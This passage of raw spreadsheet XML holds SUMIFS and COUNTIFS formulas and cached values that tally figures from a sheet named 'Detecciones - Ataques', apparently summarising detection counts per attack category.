        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>23</v>
      </c>
      <c r="AJ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>105</v>
      </c>
      <c r="AR54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>2</v>
      </c>
      <c r="BD54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>568</v>
      </c>
      <c r="BN54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>2</v>
      </c>
      <c r="BO54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>204</v>
      </c>
      <c r="BR54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>1</v>
      </c>
      <c r="CQ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI54" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ54" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK54" s="271"/>
      <c r="DO54" s="279"/>
      <c r="DP54" s="271"/>
      <c r="DQ54" s="271"/>
      <c r="DR54" s="271"/>
      <c r="DS54" s="271"/>
      <c r="DT54" s="271"/>
      <c r="DU54" s="271"/>
      <c r="DV54" s="271"/>
      <c r="DW54" s="271"/>
      <c r="DX54" s="271"/>
      <c r="DY54" s="271"/>
      <c r="DZ54" s="271"/>
      <c r="EA54" s="271"/>
      <c r="EB54" s="271"/>
      <c r="EC54" s="271"/>
      <c r="ED54" s="280"/>
      <c r="EG54" s="279"/>
      <c r="EH54" s="271"/>
      <c r="EI54" s="358" t="s">
        <v>244</v>
      </c>
      <c r="EJ54" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK54" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EL54" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EM54" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EN54" s="360">
        <f t="shared" si="37"/>
        <v>3</v>
      </c>
      <c r="EO54" s="364"/>
      <c r="EP54" s="456">
        <f t="shared" si="40"/>
        <v>0.09677419355</v>
      </c>
      <c r="EQ54" s="457">
        <f t="shared" si="41"/>
        <v>0.9032258065</v>
      </c>
      <c r="ER54" s="427">
        <f t="shared" si="42"/>
        <v>0.7142857143</v>
      </c>
      <c r="ES54" s="427">
        <f t="shared" si="43"/>
        <v>1</v>
      </c>
      <c r="ET54" s="427">
        <f t="shared" ref="ET54:ET62" si="48">1-(EJ54/EJ33)</f>
        <v>1</v>
      </c>
      <c r="EU54" s="271"/>
      <c r="EV54" s="42" t="s">
        <v>1725</v>
      </c>
      <c r="EW54" s="471" t="str">
        <f t="shared" ref="EW54:EZ54" si="47">IF(EJ32=0,"-",EJ53/EJ32)</f>
        <v>-</v>
      </c>
      <c r="EX54" s="465">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="EY54" s="465">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="EZ54" s="466">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="FA54" s="280"/>
      <c r="FK54" s="445"/>
      <c r="FL54" s="359"/>
      <c r="FM54" s="359"/>
      <c r="FN54" s="359"/>
      <c r="FO54" s="359"/>
      <c r="FP54" s="359"/>
      <c r="FY54" s="379" t="s">
        <v>427</v>
      </c>
      <c r="FZ54" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA54" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC54" s="379" t="s">
        <v>427</v>
      </c>
      <c r="GD54" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GE54" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0</v>
      </c>
    </row>
    <row r="55">
      <c r="J55" s="277"/>
      <c r="K55" s="434">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BD3:BD139)</f>
        <v>30417</v>
      </c>
      <c r="L55" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CR3:CR139)</f>
        <v>185747</v>
      </c>
      <c r="M55" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EH3:EH139)</f>
        <v>4707548</v>
      </c>
      <c r="N55" s="354">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!FX3:FX139)</f>
        <v>5246818</v>
      </c>
      <c r="O55" s="278"/>
      <c r="Q55" s="271"/>
      <c r="R55" s="352" t="s">
        <v>2514</v>
      </c>
